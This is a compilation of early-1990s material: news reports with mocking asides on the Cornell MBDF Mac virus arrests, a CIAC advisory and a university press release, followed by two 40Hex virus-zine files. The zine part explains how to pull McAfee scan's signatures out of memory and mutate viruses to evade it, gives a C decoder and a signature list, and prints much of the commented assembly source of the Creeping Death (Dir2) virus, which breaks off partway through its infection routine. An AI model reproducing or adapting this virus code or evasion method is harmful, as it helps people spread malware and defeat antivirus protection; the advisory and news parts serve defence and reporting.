The Cornell Daily Sun reported in this morning's issue that two Cornell University sophomores, David Blumenthal and Mark Pilgrim, were arrested Monday evening and arraigned in Ithaca City Court on one count each of second degree computer tampering, in connection with the release of the MBDF virus that infected Macs worldwide over the last several days. The two are being held in Tompkins County Jail.

*< Huh? How does one get arrested for spreading a virus, you ask? Read on. >*

Further charges are pending.

---

** many lines of mail routing crap have been deleted **

Date: Tue, 25 Feb 1992 11:47:32 PST
From: lipa@camis.stanford.edu (Bill Lipa)
Subject: Alleged MBDF virus-creators arrested at Cornell

"Computer Virus Traced to Cornell Students"
by Jeff Carmona
[The Cornell Daily Sun, 25 February 1992]

Two Cornell students were arrested yesterday for allegedly creating and launching *< Launching? Bon voyage, we launched you! >* a computer virus that crippled computers around the world, according to M. Stuart Lynn, the University's vice president for information technologies.

David Blumenthal '94 and Mark Pilgrim '94 were arrested by Department of Public Safety officers and arraigned in Ithaca City Court on one count of second-degree computer tampering, a misdemeanor, *< Cool, it's only a misdemeanor, how bad could it be? >* Lynn said. Both students were remanded to the Tompkins County Jail and remained in custody early this morning. They are being held on $2,000 cash or $10,000 bail bond, officials said.

Cornell received national attention in Nov. 1988 when Robert T. Morris Jr., a former graduate student, was accused of unleashing a computer virus into thousands of government and university computers. Morris, convicted under the 1986 Computer Fraud and Abuse Act, was fined $10,000, given a three-year probation and ordered to do 400 hours of community service by a federal judge in Syracuse, according to Linda Grace-Kobas, *< What's a Koba?? >* director of the Cornell News Service. Lynn would not compare the severity of the current case with Morris', saying that "each case is different."

Lynn said the virus, called "MBDFA" was put into three Macintosh games -- Obnoxious Tetris, Tetriscycle and Ten Tile Puzzle. On Feb. 14, the games were launched from Cornell to a public archive at Stanford University in Palo Alto, Calif, Lynn said. *< I guess these guys actually put it up on the archive under their own accounts! Don't they know they can trace that stuff? Duhhh... >* From there, the virus spread to computers in Osaka, Japan and elsewhere around the world *< the archive was a dumb idea if that's how they got caught, but it spread like hell >* when users connected to computer networks via modems, he added. It is not known how many computers the virus has affected worldwide, he explained.

When computer users downloaded the infected games, the virus caused "a modification of system software," *< Oooh... let's not get too technical >* Lynn said. "This resulted in unusual behavior and system crashes," he added. Lynn said he was not aware of anyone at Cornell who reported finding the virus on their computers.

The virus was traced to Cornell last Friday, authorities were quickly notified and an investigation began, Lynn said. "We absolutely deplore this kind of behavior," Lynn said. "We will pursue this matter to the fullest."

Armed with search warrants, Public Safety investigators removed more than a dozen crates full of evidence from the students' residences in Baker and Founders halls on West Campus. *< Sounds like a typical overkill bust to me. If you don't know what it is, take it. >* Public Safety officials refused to disclose the contents of the crates or issue any comment about the incident when contacted repeatedly by phone last night. *< That's because they don't know what the fuck the stuff is >*

"We believe this was dealt with very quickly and professionally," Lynn said. The suspects are scheduled to appear in Ithaca City Court at 1 p.m. today and additional charges are pending, according to Grace-Kobas. Because spreading a computer virus violates federal laws, "conceivably, the FBI could be involved," she added. Officials with the FBI could not be reached to confirm or deny this.

Blumenthal and Pilgrim, both 19-year-olds, were current student employees at Cornell Information Technologies (CIT), Lynn said. He would not say whether the students launched the virus from their residence hall rooms or from a CIT office.

Henrik N. Dullea '61, vice president for University relations, said he thinks "the act will immediately be associated with the University," not only with the individual students charged. Because a major virus originated from a Cornell student in the past, this latest incident may again "bring a negative reaction to the entire institution," Dullea said. *< "blah, blah, blah" >*

"These are very selfish acts," Lynn said, referring to the intentional distribution of computer viruses, because innocent people are harmed. Lynn said he was unaware of the students' motive for initiating the virus.

Lynn said CIT put out a notice yesterday to inform computer users about the "very virulent" virus. A virus-protection program, such as the new version of Disinfectant, can usually cure computers, but it may be necessary to "rebuild the hard drive" *< Egad! Not the dreaded "virus-that-makes-you-rebuild-your-hard-drive"! >* in some cases, he added.

A former roommate of Blumenthal said he was not surprised by news of the arrest.
Computers were "more than a hobby" for Blumenthal, said Glen Fuller '95, his roommate from last semester. "He was in front of the computer all day," Fuller said. Blumenthal, who had a modem, would "play around with viruses because they were a challenge to him," Fuller said. He said that, to his knowledge, Blumenthal had never released a virus before.

-->-<------ Cut Here --------------------------

------------------------------

VIRUS-L Digest   Friday, 28 Feb 1992   Volume 5 : Issue 46

------------------------------

Date: Wed, 26 Feb 92 11:08:45 -0800
From: karyn@cheetah.llnl.gov (Karyn Pichnarczyk)
Subject: CIAC Bulletin C-17: MBDF A on Macintosh (Mac)

NO RESTRICTIONS
_____________________________________________________

The Computer Incident Advisory Capability
_____________________________________________________

INFORMATION BULLETIN

New Virus on Macintosh Computers: MBDF A

February 25, 1992, 1130 PST                                    Number C-17
________________________________________________________________________

NAME: MBDF A virus
PLATFORM: Macintosh computers, except MacPlus and SE (see below)
DAMAGE: May cause program crashes
SYMPTOMS: Claris applications indicate they have been altered; some shareware may not work; unexplained system crashes
DETECTION & ERADICATION: Disinfectant 2.6, Gatekeeper 1.2.4, Virex 3.6, VirusDetective 5.0.2, Rival 1.1.10, SAM 3.0
________________________________________________________________________

Critical Facts about MBDF A

A new Macintosh virus, MBDF A, (named for the resource it exploits) has been discovered. This virus does not appear to maliciously cause damage, but simply copies itself from one application to another. MBDF A was discovered at two archive sites in newly posted game applications, and has a high potential to be very widespread.

Infection Mechanism

This virus is an "implied loader" virus, and it works in a similar manner to other implied loader viruses such as CDEF and MDEF. Once the virus is active, clean application programs will become infected as soon as they are executed. MBDF A infects only applications, and does not affect data files. This virus replicates under both System 6 and System 7. While MBDF A may be present on ALL types of Macintosh systems, it will not spread if the infected system is a MacPlus or a Mac SE (although it does spread on an SE/30).

Potential Damage

The MBDF A virus has no malicious damaging characteristics; however, it may cause programs to inexplicably crash when an item is selected from the menu bar. Some programs, such as the shareware "BeHierarchic" program, have been reported to not operate correctly when infected. Applications written with self-checking code, such as those written by the Claris corporation, will inform the user that they have been altered. When MBDF A infects the system file, it must re-write the entire system file back to disk; this process may take two or three minutes. If the user assumes the system has hung, and reboots the Macintosh while this is occurring, the entire system file will be corrupted and an entire reload of system software must then be performed. This virus can be safely eradicated from most infected programs, although CIAC recommends that you restore all infected files from an uninfected backup.

Detection and Eradication

Because MBDF A has been recently discovered, only anti-viral packages updated since February 20, 1992 will locate and eradicate this virus. All the major Macintosh anti-viral product vendors are aware of this virus and have scheduled updates for their products. These updates have all been available since February 24, 1992. The updated versions of some products are Disinfectant 2.6, Gatekeeper 1.2.4, Virex 3.6, SAM 3.0, VirusDetective 5.0.2, and Rival 1.1.10. Some Macintosh applications (such as the Claris software mentioned above) may contain self-verification procedures to ensure the program is valid before each execution; these programs will note unexpected alterations to their code and will inform the user.

MBDF A has been positively identified as present in two shareware games distributed by reliable archive sites: "Obnoxious Tetris" and "Ten Tile Puzzle". The program "Tetricycle" (sometimes named "Tetris-rotating") is a Trojan Horse program which installs the virus. If you have downloaded these or any other software since February 14, 1992 (the day these programs were loaded to the archive sites), CIAC recommends that you acquire an updated version of an anti-viral product and scan your system for the existence of MBDF A.

For additional information or assistance, please contact CIAC:

Karyn Pichnarczyk
(510) 422-1779 or (FTS) 532-1779
karyn@cheetah.llnl.gov

Call CIAC at (510) 422-8193 / (FTS) 532-8193. Send e-mail to ciac@llnl.gov

PLEASE NOTE: Many users outside of the DOE and ESnet computing communities receive CIAC bulletins. If you are not part of these communities, please contact your agency's response team to report incidents. Some of the other teams include the NASA NSI response team, DARPA's CERT/CC, NAVCIRT, and the Air Force response team. Your agency's team will coordinate with CIAC.

CIAC would like to thank Gene Spafford and John Norstad, who provided some of the information used in this bulletin.

This document was prepared as an account of work sponsored by an agency of the United States Government. Neither the United States Government nor the University of California nor any of their employees, makes any warranty, express or implied, or assumes any legal liability or responsibility for the accuracy, completeness, or usefulness of any information, apparatus, product, or process disclosed, or represents that its use would not infringe privately owned rights.
Reference herein to any specific commercial products, process, or service by trade name, trademark, manufacturer, or otherwise, does not necessarily constitute or imply its endorsement, recommendation or favoring by the United States Government or the University of California. The views and opinions of authors expressed herein do not necessarily state or reflect those of the United States Government or the University of California, and shall not be used for advertising or product endorsement purposes.

-->-<----- Cut Here -------------------------

---

------------------------------

VIRUS-L Digest   Friday, 28 Feb 1992   Volume 5 : Issue 46

------------------------------

Date: Wed, 26 Feb 92 15:32:02 -0500
From: mha@baka.ithaca.ny.us (Mark Anbinder)
Subject: Cornell MBDF Press Release (Mac)

_____________________________________________________

PRESS RELEASE ISSUED BY CORNELL NEWS SERVICE 2/25/91

Students charged with releasing computer virus

By Linda Grace-Kobas

Following a university investigation that tracked a computer virus and its originators, two Cornell students were arrested and charged with computer tampering for allegedly launching a computer virus embedded in three games into national computer archives.

Arraigned Feb. 24 in Ithaca City Court were David S. Blumenthal, 19, a sophomore in the College of Engineering, and Mark Andrew Pilgrim, 19, a sophomore in the College of Arts and Sciences. They were charged with computer tampering in the second degree, a Class A misdemeanor. The pair is being held in Tompkins County Jail with bail set at $2,000 cash bond or $10,000 property bond. At a hearing Tuesday afternoon, Judge Sherman returned the two to jail with the same bond and recommended that they remain in jail until at least Friday pending the federal investigation. A preliminary hearing is set for April 10.

Both students were employed by Cornell Information Technologies, which runs the university's computer facilities. Pilgrim worked as a student operator in an Apple Macintosh facility from which the virus is believed to have been launched.

The university's Department of Public Safety is working with the Tompkins County district attorney's office, and additional charges are expected to be filed. The Federal Bureau of Investigation has contacted the university to look at possible violations of federal laws, officials said. The Ithaca Police Department is also assisting in the investigation.

"We absolutely abhor this type of behavior, which appears to violate the university's computer abuse policy as well as applicable state and federal law," commented M. Stuart Lynn, vice president for information technologies, who headed the investigation to track the originators of the virus. "Cornell will pursue all applicable remedies under our own policies and will cooperate with law enforcement authorities."

Lynn said Cornell was alerted Feb. 21 that a Macintosh computer virus embedded in versions of three computer games, Obnoxious Tetris, Tetricycle and Ten Tile Puzzle, had possibly been launched through a Cornell computer. A virus is normally embedded in a program and only propagates to other programs on the host system, he explained. Typically, when an infected application is run, the virus will attack the system software and then other applications will become infected as they are run.

The virus, MBDF-A, had been deposited on Feb. 14 directly and indirectly into several computer archives in the U.S. and abroad, including SUMEX-AIM at Stanford University and archives at the University of Texas, the University of Michigan and another in Osaka, Japan. These archives store thousands of computer programs available to users of Internet, the worldwide computer network. Macintosh users who downloaded the games to their computers were subject to a variety of problems, notably the modification of system software and application programs, resulting in unusual behavior and possible system crashes. Apparently, there was no intent to destroy data, Lynn said, but data could be destroyed in system crashes.

Reports of the virus have been received from across the United States and around the world, including Wales, Britain, Lynn said, adding that he has no estimate for the number of individuals who might have obtained the games. As soon as the virus was identified, individuals and groups across the country involved with tracking viruses sent messages across computer networks to alert users who might have been affected by the virus, Lynn added. The virus has since been removed from all archives and "disinfectant" software available to the Internet community has been modified so that individual Macintosh users can purge their computers of it. "Our sense is that the virus was controlled very rapidly," he said.

In 1988, Cornell received national attention when graduate student Robert T. Morris Jr. launched a computer virus into important government and university research networks. That virus, actually considered a "worm" since it was self-perpetuating, caused major damage in high-level systems. Morris was convicted under the 1986 Computer Fraud and Abuse Act and fined $10,000, given three years probation and ordered to do 400 hours of community service by a federal judge in Syracuse, N.Y. The new virus differs greatly from the Morris worm, Lynn said. "This virus is not to be compared with the Morris worm, which independently moved from machine to machine across the network," he explained.

All Macintosh users should take appropriate measures to be certain their systems are not infected with the virus.

News Service science writer William Holder also contributed to this report.

---
Mark H. Anbinder                 607-257-2070 - FAX 607-257-2657
BAKA Computers, Inc.
QuickMail QM-QM 607-257-2614
200 Pleasant Grove Road
mha@baka.ithaca.ny.us
Ithaca, NY 14850

-->-<----- Cut Here -------------------------

40Hex Number 6 Volume 2 Issue 2 File 009

-=[ The 'McAfee scan' viral footprint codes ]=-
-or-
/*******************************************/
/* A fool and his scanner, can part a user */
/* from his hard earned money.             */
/*******************************************/

- written by -
GodNet Raider
- of -
The CyberUnderground

Thrown into 40Hex by DecimatoR from Usenet alt.security

-=[ "Information is the greatest weapon of power to the modern wizard." ]=-

]----------------------------------------------------------------------------[

Introduction:
-------------

Recently I began to wonder about the usefulness of 'virus scanners' and what, if any, difference they have from a simple text/hex search program (like Norton's filefind/ts). And if there was no real DIFFERENCE, how secure is the system that used them?

Problems with scanning:
-----------------------

The first question I had to ask was: what does a 'virus scanner' actually look for? Does it only look for one string of codes, or several at different places in the file?

To answer this question I called a local BBS and dl'ed McAfee's scan3.7v64 (to evaluate; after my tests it was erased for its lack of offering any real protection). Then I went to my archives to retrieve some viruses I have experimented with in the past (among which were Jerusalem B and Dark Avenger). I ran scan to verify that the virus files were viruses (3 of which did not set off any alarm even though there was a listing in the documentation for them, so I removed them from the test). Then using a sector editor I looked at the source for the McAfee asso. scan3.7v64 (hereafter known just as scan64) to find that the footprint information was encoded.

Needless to say this did not stop me (for the sake of those who are into the tech aspects of things, the actual method used to get the codes is included at the end of the article with the codes found). It took less than an hour to get the codes I was looking for (without disassembling the code, but by looking into the memory allocated to the program).

What I found out was that scan was just a simple hex searcher (that kept its data locked up till needed). It could also be fooled by any program that contained the same hex string as a real virus (this was proved when, using a sector editor, I added the scan64 footprint for the Jerusalem B into the top of a text file (a place this code would never show up in a real infection) then renamed it to *.com; scan64 reported it as infected).

Once the codes were obtained, using debug directly on a virus file, I was able to mutate the virus to no longer be detectable by scan64 without destroying the integrity of it. For the virus was still able to infect files, and scan64 could no longer track it. I was still able to track and control it using Norton's filefind, diskmon, diskedit, and (of course) DOS erase.

So it seems my question was answered. Some 'virus scanners' just scan for a single string of hex characters. This is fine if viruses NEVER changed or programs would NEVER use code similar to what a virus would (the smaller the footprint string, the bigger the chance of mistaken alarms). For if a 'virus scanner' programmer just keeps making a new release each time there is a new virus (and I will not get into the morality of charging customers the full price of a software upgrade rather than allowing them to buy/dl new footprint data files as they become available), the program will eventually grow to unwieldy sizes. And it should be noted there are other programs that may do the same job faster, with more upward compatibility, and you may already have them on hand.

A possible solution:
--------------------

One thing that I think is a good idea is when a program allows users to add new footprint data to it (like Norton's virus package). For now users don't need to buy new releases for detection of viruses they may not get/be able to detect. Instead, for the cost of a call to a support BBS (part of the original software agreement?), the user can get new data as it becomes available, or when they find a new one on their system they can immediately add the new footprint rather than wait for the next version to be released.

Method used to obtain footprints:
---------------------------------

After finding the data I was looking for was encoded I thought, how can I get the data I wanted for my tests? Disassembling was out, not for any MORAL reason but for the time involved. So I thought it must have to decode the data for its own use, and to save time it would do it all before the scan rather than slow the process down by doing a full decode. So I needed to look at the memory image of the running program. Thanks to DOS 5.0 and dosshell I was able to do this. After spawning the scan task under the dos shell I used alt-tab to swap back to the shell. Once back in the shell I used the shell commands to copy the tmpxxx.swp to foo.img and terminated scan64 and dosshell.

Then using a sector editor I searched through the temp file created by the dos shell. I found an area of data that contained the virus names and non-ASCII data separating them. Even though the strings of ASCII data (virus names) ended with a zero character (as variable strings have a tendency to), the random data did not end with a common signal character (as expected, for code can be any character). There was also no character count stored (the data length varied, so it could not be assumed by the scan program as well). So I continued to search through the data. I eventually found another area that had the same text strings (virus names).
This time the first character of the non-ASCII data gave the count of the data size to the following text string. I knew I had found it, so I extracted this data to another file (starting at 0 offset in the new file). Then I wrote down some of the codes and checked them against viruses I had. The codes I had did not seem to match. This did not stop me.

I took one virus (that my understanding said scan was only looking for 6 consecutive bytes to match) and started zapping bytes (in a file scan said was infected) to find what it was looking for. The process involved zapping one sector at a time till scan said it was not infected, then half of that sector, then half of a half, and so on. It came down to 6 CONSECUTIVE bytes as I expected. But they were DIFFERENT from the ones I had.

So I went to the Windows calculator (it allows byte arithmetic in hex, i.e. 0xff + 0x04 = 0x03 (rollover, carry is ignored); it would be outside the scope of this ARTICLE to explain why I thought byte arithmetic was important). Some quick subtraction found a 0x93 (decimal 147) DIFFERENCE between the actual codes and the ones from the allocated memory used by scan. So taking another virus that scan said was infected I did the minor hex math on the codes in the allocated memory used by scan and found the codes. Then I zapped only the codes and ran scan on the updated virus file. It said there was no infection. I knew I now had the right codes (after a few more checks).

So I created a simple C program (see below) to convert the extract file I created and converted the codes to a readable form (output from program listed at end of ARTICLE). Then tested other viruses against the list. And found the same results.

Binary to hex program:
----------------------

/* fp2txt.c
   Convert footprint binary information to text.
   by GodNet Raider

   Notes: Please forgive the unrefined/unannotated nature of this code;
   it was designed as a one shot.
*/

#include <stdio.h>
#include <stdlib.h>

#define TRUE     1
#define MAGICNUM 0x93   /* difference between stored and real footprint bytes */

int main (void)
{
    unsigned char sVirusFP [256], *ptVirusInfo, szVirusName [128];
    unsigned int nTmpCnt;
    int c;
    FILE *Stream;

    /* fp2.img holds the records extracted from the scanner's memory image:
       a count byte, that many encoded footprint bytes, the zero-terminated
       virus name, then one filler byte. */
    Stream = fopen ("fp2.img", "rb");
    if (Stream == NULL) {
        perror ("fp2.img");
        return 1;
    }

    /* A zero count byte (or end of file) ends the table. */
    while ((c = getc (Stream)) != EOF && c != 0) {
        sVirusFP [0] = (unsigned char) c;
        nTmpCnt = sVirusFP [0];

        /* Decode the footprint: stored byte minus MAGICNUM, carry ignored. */
        for (ptVirusInfo = sVirusFP + 1; nTmpCnt--; ptVirusInfo++) {
            if ((c = getc (Stream)) == EOF)
                goto done;
            *ptVirusInfo = (unsigned char) (c - MAGICNUM);
        }

        /* The virus name follows, terminated by a zero byte. */
        ptVirusInfo = szVirusName;
        while ((c = getc (Stream)) != EOF && c != 0) {
            if (ptVirusInfo < szVirusName + sizeof szVirusName - 1)
                *ptVirusInfo++ = (unsigned char) c;
        }
        *ptVirusInfo = '\0';
        if (c == EOF)
            goto done;

        printf ("\n%s:\n ", szVirusName);
        nTmpCnt = sVirusFP [0];
        for (ptVirusInfo = sVirusFP + 1; nTmpCnt--; ptVirusInfo++) {
            printf ("0x%02x ", (unsigned int) *ptVirusInfo);
            if (nTmpCnt && !((sVirusFP [0] - nTmpCnt) % 8))
                printf ("\n ");
        }
        printf ("\n");
        getc (Stream);          /* skip the filler byte between records */
    }

done:
    fclose (Stream);
    return 0;
}

Footprints discovered:
----------------------

The following is a list of the footprint codes found in McAfee asso. Scan3.7v64.

1008 Virus [1008]: 0x81 0xed 0x38 0x00 0xe8 0xc3
Stoned-II Virus [S-2]: 0x9c 0x2e 0xff 0x1e 0x09 0x00
VHP-2 Virus [VHP2]: 0x1c 0x8c 0x44 0x02 0xb8 0x24 0x35 0xcd 0x21 0x89
VHP Virus [VHP]: 0x07 0x89 0x7e 0x8a 0x8d 0x7e 0x90 0x89 0x7e 0x88
Taiwan3 Virus [T3]: 0x17 0x0f 0x32 0x0a 0x32 0x0a 0x90 0x0b 0xfb 0x08
Armagedon Virus [Arma]: 0xb8 0x00 0x43 0xcd 0x21 0x2e 0x89 0x0e 0x48 0x01
1381 Virus [1381]: 0x1e 0x06 0x8c 0xc8 0x8e 0xd8 0xb8 0x40 0x00 0x8e
Tiny Virus [Tiny]: 0xb4 0x40 0x8d 0x94 0xab 0x01 0xb9 0x02 0x00 0xcd
Subliminal Virus [Sub]: 0x8b 0x3e 0x25 0x01 0x8b 0xd7 0x2e 0x8e 0x06 0x27
Sorry Virus [Sorry]: 0xeb 0x96 0x83 0x2e 0x12 0x00 0x40 0x83 0x2e 0x03
1024 Virus [1024]: 0xc8 0x75 0xed 0x8b 0xd1 0xb8 0x00 0x42 0xcd 0x21 0x72
RedX Virus [RedX]: 0x52 0x8b 0x9c 0x17 0x04 0xb9 0x19 0x03 0x8d 0x94
VP Virus [VP]: 0x21 0x89 0x1e 0x22 0x03 0x8c 0x06 0x24 0x03 0xb4
Print Screen-2 [P-2]: 0x74 0x01 0xbf 0x03 0x00 0xb9 0x20 0x00 0xf3 0xa4
Joshi Virus [Joshi]: 0xf3 0xa4 0x8c 0xc0 0x05 0x20 0x00 0x8e 0xc0 0xbb
Microbes Virus [Micro]: 0x8e 0xd0 0xbc 0x00 0xf0 0xfb 0xa1 0x13
]============================================================================[

40Hex Number 6 Volume 2 Issue 2                                       File 00A

Welcome to this issue's VIRUS SPOTLITE, the infamous Creeping Death (Dir2).
This is one of the most impressive viruses out there, and VirusSoft looks to be
a promising group in the future. Unfortunately, the source code we obtained had
almost no comments. Dark Angel commented it as best as he possibly could, but I
think it is safe to say that there may be a few discrepancies. Nonetheless, it
was an excellent job, kudos to DA. Although I am writing this header, I had
nothing to do with the commenting, so Dark Angel gets all the credit.

                                                                      -)GHeap
-------------------------------------------------------------------------------

; Dark Angel's comments: I spent my entire waking hours looking at this virus.
;                        I love it. It is my life. I worship the drive it
;                        infects. Take a look at it. Let not my troubles be
;                        in vain. Why did I do this? I sacrifice my life for
;                        the benefit of 40Hex. If you don't read this, I'm
;                        gonna go join [NuKE].

; Creeping Death V 1.0
;
; (C) Copyright 1991 by VirusSoft Corp.
i13org = 5f8h i21org = 5fch dir_2 segment byte public assume cs:dir_2, ds:dir_2 org 100h start: mov sp,600h ; Set up the stack pointer inc word ptr counter ; Generation counter xor cx,cx mov ds,cx ; DS points to interrupt table lds ax, ds:[0c1h] ; Find interrupt 30h add ax,21h ; Change it to Int 21h push ds ; Save it on stack for use by push ax ; subroutine "jump" mov ah,30h ; Get DOS version call jump cmp al,4 ; DOS 4.X+ : SI = 0 sbb si,si ; DOS 2/3 : SI = -1 mov byte ptr [drive+2],byte ptr -1 ; Initialise last drive to ; "never accessed" mov bx,60h ; Adjust memory in ES to mov ah,4ah ; BX paragraphs. call jump mov ah,52h ; Get DOS List of Lists call jump ; to ES:BX push es:[bx-2] ; Save Segment of first MCB lds bx,es:[bx] ; DS:BX -> 1st DPB ; (Drive parameter block) search: mov ax,[bx+si+15h] ; Get segment of device driver cmp ax,70h ; Is it CONFIG? (I think) jne next ; If not, try again xchg ax,cx ; Move driver segment to CX mov [bx+si+18h],byte ptr -1 ; Flag block must be rebuilt mov di,[bx+si+13h] ; Save offset of device driver ; Original device driver ; address in CX:DI mov [bx+si+13h],offset header ; Replace with our own mov [bx+si+15h],cs ; (header) next: lds bx,[bx+si+19h] ; Get next device block cmp bx,-1 ; Is it the last one? jne search ; If not, search it jcxz install pop ds ; Restore segment of first mov ax,ds ; MCB add ax,ds:[3] ; Go to next MCB inc ax ; AX = segment next MCB mov dx,cs ; DX = MCB owning current dec dx ; program cmp ax,dx ; Are these the same? 
jne no_boot ; If not, we are not currently ; in the middle of a reboot add word ptr ds:[3],61h ; Increase length owned by ; MCB by 1552 bytes no_boot: mov ds,dx ; DS = MCB owning current ; program mov word ptr ds:[1],8 ; Set owner = DOS mov ds,cx ; DS = segment of original ; device driver les ax,[di+6] ; ES = offset int handler ; AX = offset strategy entry mov word ptr cs:str_block,ax ; Save entry point mov word ptr cs:int_block,es ; And int block for use in ; function _in cld ; Scan for the write mov si,1 ; function in the scan: dec si ; original device driver lodsw cmp ax,1effh jne scan mov ax,2cah ; Wicked un-yar place o' cmp [si+4],ax ; doom. je right cmp [si+5],ax jne scan right: lodsw push cs pop es mov di,offset modify+1 ; Save address of patch stosw ; area so it can be changed xchg ax,si ; later. mov di,offset i13org ; This is in the stack, but cli ; it is used by "i13pr" movsw movsw mov dx,0c000h ; Scan for hard disk ROM ; Start search @ segment C000h fdsk1: mov ds,dx ; Load up the segment xor si,si ; atart at offset 0000h lodsw ; Scan for the signature cmp ax,0aa55h ; Is it the signature? jne fdsk4 ; If not, change segment cbw ; clear AH lodsb ; load a byte to AL mov cl,9 sal ax,cl ; Shift left, 0 filled fdsk2: cmp [si],6c7h jne fdsk3 cmp word ptr [si+2],4ch jne fdsk3 push dx ; Save the segment push [si+4] ; and offset on stack jmp short death ; for use by i13pr install: int 20h file: db "c:",255,0 fdsk3: inc si ; Increment search offset cmp si,ax ; If we are not too high, jb fdsk2 ; try again fdsk4: inc dx ; Increment search segment cmp dh,0f0h ; If we are not in high jb fdsk1 ; memory, try again sub sp,4 ; effectively push dummy vars. death: push cs ; on stack for use by i13pr pop ds mov bx,ds:[2ch] ; Get environment from PSP mov es,bx mov ah,49h ; Release it (to save memory) call jump xor ax,ax test bx,bx ; Is BX = 0? 
jz boot ; If so, we are booting now mov di,1 ; and not running a file seek: dec di ; Search for end of scasw ; the environment block jne seek lea si,[di+2] ; SI points to filename jmp short exec ; (in DOS 3.X+) ; Execute that file boot: mov es,ds:[16h] ; get PSP of parent mov bx,es:[16h] ; get PSP of parent dec bx ; go to its MCB xor si,si exec: push bx mov bx,offset param ; Set up parameter block ; for EXEC function mov [bx+4],cs ; segment to command line mov [bx+8],cs ; segment to 1st FCB mov [bx+12],cs ; segment to 2nd FCB pop ds push cs pop es mov di,offset f_name push di ; Save filename offset mov cx,40 ; Copy the filename to rep movsw ; the buffer push cs pop ds mov ah,3dh ; Handle open file mov dx,offset file ; "c:ÿ",0 call jump pop dx ; DS:DX -> filename mov ax,4b00h ; Load and Execute call jump ; ES:BX = param block mov ah,4dh ; Get errorlevel call jump mov ah,4ch ; Terminate jump: pushf ; Simulate an interrupt 21h call dword ptr cs:[i21org] ret ;--------Installation complete i13pr: mov ah,3 ; Write AL sectors from ES:BX jmp dword ptr cs:[i13org] ; to track CH, sector CL, ; head DH, drive DL main: push ax ; driver push cx ; strategy block push dx push ds push si push di push es ; Move segment of parameter pop ds ; block to DS mov al,[bx+2] ; [bx+2] holds command code cmp al,4 ; Input (read) je input cmp al,8 ; Output (write) je output cmp al,9 ; Output (write) with verify je output call in_ ; Call original device cmp al,2 ; Request build BPB jne ppp ; If none of the above, exit lds si,[bx+12h] ; DS:SI point to BPB table mov di,offset bpb_buf ; Replace old pointer with mov es:[bx+12h],di ; a pointer to our own mov es:[bx+14h],cs ; BPB table push es ; Save segment of parameters push cs pop es mov cx,16 ; Copy the old BPB table to rep movsw ; our own pop es ; Restore parameter segment push cs pop ds mov al,[di+2-32] ; AL = sectors per allocation cmp al,2 ; unit. 
If less than adc al,0 ; 2, increment cbw ; Extend sign to AH (clear AH) cmp word ptr [di+8-32],0 ; Is total number sectors = 0? je m32 ; If so, big partition (>32MB) sub [di+8-32],ax ; Decrease space of disk by ; one allocation unit(cluster) jmp short ppp ; Exit m32: sub [di+15h-32],ax ; Handle large partitions sbb word ptr [di+17h-32],0 ppp: pop di pop si pop ds pop dx pop cx pop ax rts: retf ; We are outta here! output: mov cx,0ff09h call check ; is it a new disk? jz inf_sec ; If not, go away call in_ ; Call original device handler jmp short inf_dsk inf_sec: jmp _inf_sec read: jmp _read read_: add sp,16 ; Restore the stack jmp short ppp ; Leave device driver input: call check ; Is it a new disk? jz read ; If not, leave inf_dsk: mov byte ptr [bx+2],4 ; Set command code to READ cld lea si,[bx+0eh] ; Load from buffer address mov cx,8 ; Save device driver request save: lodsw ; on the stack push ax loop save mov word ptr [bx+14h],1 ; Starting sector number = 1 ; (Read 1st FAT) call driver ; Read one sector jnz read_ ; If error, exit mov byte ptr [bx+2],2 ; Otherwise build BPB call in_ ; Have original driver do the ; work lds si,[bx+12h] ; DS:SI points to BPB table mov ax,[si+6] ; Number root directory entries add ax,15 ; Round up mov cl,4 shr ax,cl ; Divide by 16 to find sectors ; of root directory mov di,[si+0bh] ; DI = sectors/FAT add di,di ; Double for 2 FATs stc ; Add one for boot record adc di,ax ; Add sector size of root dir push di ; to find starting sector of ; data (and read) cwd ; Clear DX mov ax,[si+8] ; AX = total sectors test ax,ax ; If it is zero, then we have jnz more ; an extended partition(>32MB) mov ax,[si+15h] ; Load DX:AX with total number mov dx,[si+17h] ; of sectors more: xor cx,cx sub ax,di ; Calculate FAT entry for last ; sector of disk sbb dx,cx mov cl,[si+2] ; CL = sectors/cluster div cx ; AX = cluster # cmp cl,2 ; If there is more than 1 sbb ax,-1 ; cluster/sector, add one push ax ; Save cluster number call convert ; AX = sector number to 
read ; DX = offset in sector AX ; of FAT entry ; DI = mask for EOF marker mov byte ptr es:[bx+2],4 ; INPUT (read) mov es:[bx+14h],ax ; Starting sector = AX call driver ; One sector only again: lds si,es:[bx+0eh] ; DS:SI = buffer address add si,dx ; Go to FAT entry sub dh,cl ; Calculate a new encryption adc dx,ax ; value mov word ptr cs:gad+1,dx ; Change the encryption value cmp cl,1 ; If there is 0 cluster/sector je small_ ; then jump to "small_" mov ax,[si] ; Load AX with offset of FAT ; entry and ax,di ; Mask it with value from ; "convert" then test to see ; if the sector is fine cmp ax,0fff7h ; 16 bit reserved/bad je bad cmp ax,0ff7h ; 12 bit reserved/bad je bad cmp ax,0ff70h ; 12 bit reserved/bad jne ok bad: pop ax ; Tried to replicate on a bad dec ax ; cluster. Try again on a push ax ; lower one. call convert ; Find where it is in the FAT jmp short again ; and try once more small_: not di ; Reverse mask bits and [si],di ; Clear other bits pop ax ; AX = cluster number push ax inc ax ; Need to do 2 consecutive push ax ; bytes mov dx,0fh test di,dx jz here inc dx ; Multiply by 16 mul dx here: or [si],ax ; Set cluster to next pop ax ; Restore cluster of write call convert ; Calculate buffer offset mov si,es:[bx+0eh] ; Go to FAT entry (in buffer) add si,dx mov ax,[si] and ax,di ok: mov dx,di ; DI = mask from "convert" dec dx and dx,di ; Yerg! not di and [si],di or [si],dx ; Set [si] to DI cmp ax,dx ; Did we change the FAT? pop ax ; i.e. Are we already on this pop di ; disk? mov word ptr cs:pointer+1,ax ; Our own starting cluster je _read_ ; If we didn't infect, then ; leave the routine. Oh ; welp-o. 
